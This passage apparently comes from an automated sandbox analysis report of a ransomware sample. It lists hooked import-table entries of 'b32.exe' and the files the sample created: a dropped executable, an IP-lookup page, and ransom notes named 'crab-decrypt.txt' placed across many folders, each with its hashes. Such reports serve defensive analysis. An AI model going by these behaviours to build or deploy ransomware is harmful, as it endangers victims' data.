IAT private_0x000000000aa50000:+0x14e7c 50. entry of b32.exe 4 bytes kernel32.dll:TlsSetValue+0x0 now points to private_0x000000007fff0000:+0x3f0ebf67
IAT private_0x000000000aa50000:+0x14e7c 51. entry of b32.exe 4 bytes kernel32.dll:TlsFree+0x0 now points to private_0x000000007fff0000:+0x2d030537
IAT private_0x000000000aa50000:+0x14e7c 54. entry of b32.exe 4 bytes kernel32.dll:GetProcAddress+0x0 now points to private_0x000000007fff0000:+0x14fb7805
IAT private_0x000000000aa50000:+0x14e7c 55. entry of b32.exe 4 bytes kernel32.dll:LCMapStringW+0x0 now points to private_0x000000007fff0000:+0x15680b32
IAT private_0x000000000aa50000:+0x14e7c 57. entry of b32.exe 4 bytes kernel32.dll:IsValidLocale+0x0 now points to private_0x000000007f0e0000:+0xcf974b
IAT private_0x000000000aa50000:+0x14e7c 58. entry of b32.exe 4 bytes kernel32.dll:GetUserDefaultLCID+0x0 now points to private_0x000000007fff0000:+0x7524cc0
IAT private_0x000000000aa50000:+0x14e7c 60. entry of b32.exe 4 bytes kernel32.dll:IsDebuggerPresent+0x0 now points to pagefile_0x000000000ae70000:+0x1176990
IAT private_0x000000000aa50000:+0x14e7c 62. entry of b32.exe 4 bytes kernel32.dll:GetCurrentThreadId+0x0 now points to private_0x000000007fff0000:+0x6b5988df
IAT private_0x000000000aa50000:+0x14e7c 63. entry of b32.exe 4 bytes kernel32.dll:ExitProcess+0x0 now points to private_0x000000007fff0000:+0x7d008799
IAT private_0x000000000aa50000:+0x14e7c 65. entry of b32.exe 4 bytes ntdll.dll:RtlSizeHeap+0x0 now points to private_0x000000007fff0000:+0x17edf2fd
IAT private_0x000000000aa50000:+0x14e7c 66. entry of b32.exe 4 bytes kernel32.dll:GetStdHandle+0x0 now points to private_0x000000007fff0000:+0x6a990fce
IAT private_0x000000000aa50000:+0x14e7c 67. entry of b32.exe 4 bytes kernel32.dll:GetFileType+0x0 now points to private_0x000000007fff0000:+0x4ff0c25f
IAT private_0x000000000aa50000:+0x14e7c 68. entry of b32.exe 4 bytes kernel32.dll:GetModuleFileNameA+0x0 now points to private_0x000000007fff0000:+0x46d9dfc1
IAT private_0x000000000aa50000:+0x14e7c 69. entry of b32.exe 4 bytes kernel32.dll:WriteFile+0x0 now points to private_0x000000007fff0000:+0x3e4985e
IAT private_0x000000000aa50000:+0x14e7c 71. entry of b32.exe 4 bytes kernel32.dll:QueryPerformanceCounter+0x0 now points to b32.exe:+0x3379713
IAT private_0x000000000aa50000:+0x14e7c 72. entry of b32.exe 4 bytes kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x000000007fff0000:+0x45488212
IAT private_0x000000000aa50000:+0x14e7c 73. entry of b32.exe 4 bytes kernel32.dll:GetSystemTimeAsFileTime+0x0 now points to private_0x000000007fff0000:+0x185b5570
IAT private_0x000000000aa50000:+0x14e7c 74. entry of b32.exe 4 bytes kernel32.dll:GetEnvironmentStringsW+0x0 now points to private_0x000000007fff0000:+0x574fcded
IAT private_0x000000000aa50000:+0x14e7c 76. entry of b32.exe 4 bytes kernel32.dll:IsValidCodePage+0x0 now points to private_0x000000007fff0000:+0x539c408e
IAT private_0x000000000aa50000:+0x14e7c 79. entry of b32.exe 4 bytes ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x4652d4cc
IAT private_0x000000000aa50000:+0x14e7c 80. entry of b32.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to b32.exe:+0x2241364
IAT private_0x000000000aa50000:+0x14e7c 82. entry of b32.exe 4 bytes user32.dll:DrawCaption+0x0 now points to private_0x000000007fff0000:+0x6d19f1b
IAT private_0x000000000aa50000:+0x14e7c 83. entry of b32.exe 4 bytes user32.dll:IsChild+0x0 now points to private_0x000000007fff0000:+0x7efe7396
IAT private_0x000000000aa50000:+0x14e7c 84. entry of b32.exe 4 bytes user32.dll:DeleteMenu+0x0 now points to private_0x000000007fff0000:+0x4349c4dc
IAT private_0x000000000aa50000:+0x14e7c 87. entry of b32.exe 4 bytes user32.dll:LoadCursorFromFileW+0x0 now points to b32.exe:+0x83b1d02
IAT private_0x000000000aa50000:+0x14e7c 88. entry of b32.exe 4 bytes user32.dll:PostMessageA+0x0 now points to private_0x000000007fff0000:+0x48040a37
IAT private_0x000000000aa50000:+0x14e7c 89. entry of b32.exe 4 bytes user32.dll:GetMenuInfo+0x0 now points to b32.exe:+0x2c3d547
Created Files
Filename File Size Hash Values YARA Match Actions
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\cjrckv.exe 316.01 KB MD5: d0ec32ab9a895228881853c93de2f114
SHA1: a618165bd1e1b7952094d1c359b669c1440955e3
SHA256: fbcdb754dc4900291e176d0813c7ae4d676a1162afd932e92fc937c8f038f060
False
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\mm5o9xqs\ipv4bot_whatismyipaddress_com[1].htm 0.01 KB MD5: 1ce60aba3db0d29b45efe5656ad3102f
SHA1: 35a57dd3879673a8ac7059436dd822908bc62ae0
SHA256: a72d2ffbc219352f26da160be3929dd799985249b6f0851382dc48a6778fa9b8
False
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\mm5o9xqs\eeploreza[1].txt 0.54 KB MD5: 655b9148a0483fdb46cde6ff76468abd
SHA1: d0d172acbef9b9b42b5e8f81b7f4220fcdb605fe
SHA256: 51cd053570467d63f274e982e4bfbc0775309bf5fe5374bf238a4f605a54d0bd
False
c:\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\$recycle.bin\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\$recycle.bin\s-1-5-21-3388679973-3930757225-3770151564-1000\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\config.msi\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\msocache\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\perflogs\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\perflogs\admin\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\program files\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\program files\microsoft sql server compact edition\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\program files\microsoft sql server compact edition\v3.5\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\program files\microsoft sql server compact edition\v3.5\desktop\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\program files (x86)\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\recovery\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\system volume information\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\system volume information\spp\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\system volume information\spp\onlinemetadatacache\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\system volume information\spp\sppcbshivestore\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\system volume information\spp\sppgroupcache\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\collab\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\forms\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\javascripts\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\security\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\security\crlcache\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\flash player\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\flash player\assetcache\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\flash player\assetcache\d5ntrc6r\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\headlights\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\linguistics\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\linguistics\dictionaries\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\logtransport2\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\identities\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\identities\{31810c36-5d23-4cce-a3b4-316ded195c38}\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\macromedia\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\macromedia\flash player\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\macromedia\flash player\#sharedobjects\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\macromedia\flash player\#sharedobjects\p7y3f7qb\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\macromedia\flash player\macromedia.com\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\macromedia\flash player\macromedia.com\support\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\addins\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\credentials\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\crypto\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\crypto\rsa\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-3388679973-3930757225-3770151564-1000\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\document building blocks\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\document building blocks\1033\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\document building blocks\1033\14\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\excel\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\excel\xlstart\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\ime12\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\imjp12\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\imjp8_1\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\imjp9_0\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\quick launch\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\implicitappshortcuts\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\userdata\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\userdata\low\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\userdata\low\65ux3yg0\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\userdata\low\ay721qdr\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\userdata\low\dzbkzbic\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\userdata\low\vrlzoz0e\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\mmc\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\ms project\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
